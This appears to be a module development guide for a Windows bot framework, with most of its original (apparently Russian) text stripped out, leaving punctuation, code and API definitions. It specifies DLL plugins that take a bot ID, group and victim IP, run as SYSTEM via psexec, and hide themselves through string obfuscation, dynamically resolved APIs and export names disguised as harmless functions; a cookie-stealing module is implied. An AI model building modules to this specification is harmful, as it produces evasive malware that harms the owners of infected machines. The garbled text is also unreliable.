  

    DLL,       .
 64    64- ,   32   32- .
       ++.         ,    :
1.    Visual C++ Runtime.  malloc, memcpy, str* -  .  WinAPI       malloc  HeapAlloc,  memcpy  CopyMemory,  strstr  StrStr (shlwapi.h/.lib).
1.1. STL     .    std::mutex.  -     !
1.2.   STL     .  std::mutex   200.      ,   ,        !
1.3.   1  1.1      .
2.           ( /MT). 
3.    ,        malloc/realloc/free (        VirtualAlloc).            (     - dll-,      Windows).
4.         ,       (nt authority\SYSTEM),    ( ).   ,  Session 0 isolation/Services isolation in session 0.
5.          ,             .
   ,       .         ,      ,   production  .
,   ,   :
1.    .         .      .
2.        (..,       -  /  ,      ).
3.      ,      (       ):
a.  /  (ReadProcessMemory/WriteProcessMemory)
b. Named pipes


 
1.    Microsoft Visual Studio    2015.
2.  Visual Studio     :
*    :
-  : $(SolutionDir)Bin\$(PlatformTarget)\$(Configuration)\
-  : $(SolutionDir)\obj\$(Platform)\$(Configuration)\$(ProjectName)\
-  : 
*  Release:
-    (/++  ): 
-    (/): 
3.    Andrivet (, . _STR())
4.     GetApi.h.  ,     .
5.      - x32-  x64-.
6.         ,    .
7.     .      c:/temp/modulename.log (     ).
          .
8.       config.h ( ,   -     - , -   ).
9.        Windows.
      Windows - Windows XP (  - Windows Vista).
10.       notelemetry.obj (https://stackoverflow.com/questions/37761768/how-to-prevent-visual-studio-2015-update-2-to-add-telemetry-main-invoke-trigger)


 

     :

 modulename/Release_logged/x86
 modulename/Release_logged/x64
 modulename/Release_nologs/x86
 modulename/Release_nologs/x64

 Release_logged        (      Release!
..      ,    ).
 release_nologs -   ,   .
           ( cookies.22.04.2019).
        ,     ( cookies.22.04.2019.2)

      -       ,
     ,         .


 

     :
1.   Windows 7, 8.1, 10  32-,   64- .       ,   MSVC++ runtime library (..,          ).
2.     (,    )
3.    
4.    (  pstools,   : 
psexec d s runmodule.exe
      SYSTEM
        .


   

      .   ClientID,   group,  IP-     Start   ParentInfo
     Control (  ,        CtlArg).
         CtlArg  CtlArgLen.    .
  ,   -,       loadLIbrary.    :
main() {
  LoadLibrary(module.dll);
  Start = GetProcAddress(module, Start);
  Handle = Start();
  If(!handle) return 1;
  Control(config, config body);
  While(true) sleep(1000);
  Release(handle);
}
 ,  :
1. -     (DLL)    start  control     ,  ip-, clientid  group.
2.   ,    .

  :
*  Start()  ,      ,     (,   Start)
*    ,      Control()  ,     .
        -     .
*  Control()  ,     ,    (  ).
       .      ,      ,
       .

API 
   : Start, Control, Release, FreeBuffer [*1]
     stdcall    .
 Start   :
PVOID Start(
	LPCSTR ModuleName,	
	LPCBYTE Arg,
	SIZE_T ArgLen,
	LPSTR ResultInfo,
	const ParentInfo* pParentData,
	PVOID EventCallback,
	PVOID EventCallbackContext,
	PVOID Reserved1);
      .
ModuleName -  
Arg -   start
ArgLen -   CtlArg  
ResultInfo -    ctl.     1024 
pParentData -    ,   
EventCallback      (.)
EventCallbackContext    (.)
     ,       Control  Release (     Start       ).      .

typedef struct ParentInfo {
	CHAR ParentID[256];
	CHAR ParentGroup[64];
	CHAR SelfIP[64];
	LPCWSTR ParentFiles;
} ;
ParentID -  ID   
ParentGroup -    
SelfIP -  IP- 
ParentFiles -  

6.2  Control   
BOOL Control (
	PVOID ModuleHandle,
	LPCSTR Ctl,	
	LPCBYTE CtlArg,
	SIZE_T CtlArgLen,
	LPSTR CtlResultInfo,
	PVOID* ppOutData,
	PDWORD pOutDataSize,
	LPCSTR pOutDataTag,	
	PVOID Reserved1);

ModuleHandle -  ,    Start.
Ctl -       
CtlArg -  ctl   ( )
CtlArgLen -   CtlArg  
ResultInfo -    ctl.     1024 
ppOutData -              ctl (ctl_OutData)
pOutDataSize -                ctl
pOutDataTag -    ,     .     128 
     TRUE,      FALSE.      *ppOutData     ,         FreeBuffer.
       .

 Release   
VOID Release (
	PVOID ModuleHandle);
     .            .

 FreeBuffer   
VOID FreeBuffer (
	PVOID pMemory);
      Control ( ppOutData).

*     
1)  ,  ,        
2)     4   ,      
CheckFuncStr=Start, GetLength=Control, SetHeigth=Release, Reload=FreeBuffer.
    ,         .
3)     ,   ,     : 1.Start, 2.Control, 3.FreeBuffer 4.Release
 def     
EXPORTS
@1		= Start_
@2		= Control_
@3		= FreeBuffer_
@4		= Release_
 def     :
CheckFuncStr		= Start_
GetLength		= Control_
Reload		= FreeBuffer_
SetHeigth		= Release_

    

    Start      .
EventCallback -    ,  :

typedef VOID (__stdcall *pEventCallback)(
	PVOID ModuleHandle,
	LPCSTR EventName,
	LPCSTR EventInfo,
	PVOID pOutData,
	DWORD OutDataSize,
	LPCSTR pOutDataTag,
	PVOID Context);

:
	ModuleHandle -   (     Start)
	EventName -  
	EventInfo -  
	pOutData -   
	OutDataSize -  .
	pOutDataTag -  
	Context -   EventCallbackContext,   Start

      
void SendEvent(char* name, char* value) {
	pEventCallback callback = (pEventCallback)EvCallback;
	if (callback) {
		debug_printf("SendEvent(%s, %s)\r\n", name, value);
		callback(Start, name, value, NULL, 0, tag, EvCallbackContext);
	}
}

tag   -   (    ;    .  , "module1")
name  -   (       -   ,   .  , "sql")
value -   ( .  , "module1 build 01 Jan, 20xx 11:22:25 started ok")

    .
    4 .  ,    DEBG  , VERS    , PING   heartbeat'  , .
,    ,    .  ,       ,    -     "file"  "net".
      , ..        ,    .      ,     .
 -   -    -       ,       (_stdcall).

!!!!!!!!!!!
!!!!!!
!!!!!!!!!!!

          .   .
..        ,     ,     .

    .

 ,       .      
  . ,     ,       .
    ,     -       .

   (    ),       
EventName = WantRelease
EventInfo = NULL
         .


 

1)   (),          Start.
  .
 :
- Start   , ,     
-        

2)   Start  botid, group  ip.
       Start,             .
